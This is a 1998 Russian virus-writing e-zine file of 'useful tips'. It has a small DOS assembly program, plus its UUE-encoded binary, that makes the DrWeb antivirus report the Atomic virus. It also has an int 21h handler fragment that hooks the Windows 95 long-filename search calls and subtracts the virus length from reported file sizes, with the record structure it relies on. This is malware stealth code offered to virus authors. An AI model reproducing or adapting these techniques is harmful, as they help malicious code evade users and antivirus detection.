[TulaAnti&ViralClub] PRESENTS ...
MooN_BuG, Issue 8, Nov 1998 file 00C
Полезные советы
by All
──────────────────────────────────────────────────────────────────────────────
DrWeb срабатывает на этот файл как на вирус Atomic
(c) VVS
.model tiny
.code
org 100h
start:
push ax
push cx
mov cx,09EBh
mov ax,0FE05h
jmp $-2
add ah,03Bh
jmp $-10
pop ax
pop cx
retn
end start
=== Cut ===
section 1 of 1 of file atomic.com -={ UUE 1.06, ARA (C) 1995 }=-
begin 644 atomic.com 8-21-1998 16:6:36
24%&YZPFX!?[K_(#$.^OT6%G#
`
end
sum -r/size 55144/72 section (from "begin" to "end")
sum -r/size 23353/18 entire input file
=== Cut ===
──────────────────────────────────────────────────────────────────────────────
(c) VVS
V>> Я тут подумал над стелсированием в дос-окне под виндой, может
V>> использовать функции 714eh и 714fh (int 21h). Пока еще к
V>> результатам не пришел, может у тебя есть информация об
V>> использовании вирусами этих функций.
ID> нет, у меня такой инфоpмации нет.
Я уже попробовал...результат нормальный.
int21handler: ......
cmp ax,714eh
jz w95find
cmp ax,714fh
jz w95find
...
w95find: call orig21h
jc end95find
pushf
sub word ptr es:[di.LFSize],lvir
popf
end95find: retf2
=== Cut ===
; Format of Windows95 long filename FindData record:
W95FindDataRecord STRUC
FAttrib DB 4 DUP (?) ; file attributes
FCrTime DB 8 DUP (?) ; file creation time
LATime DB 8 DUP (?) ; last access time
LMTime DB 8 DUP (?) ; last modification time
HFSize DB 4 DUP (?) ; file size (high 32 bits)
LFSize DB 4 DUP (?) ; file size (low 32 bits)
reserved DB 8 DUP (?) ;
FullName DB 260 DUP (?) ; ASCIZ full filename
ShortName DB 14 DUP (?) ; ASCIZ short filename(for backward compatibility)
W95FindDataRecord ENDS
=== Cut ===
──────────────────────────────────────────────────────────────────────────────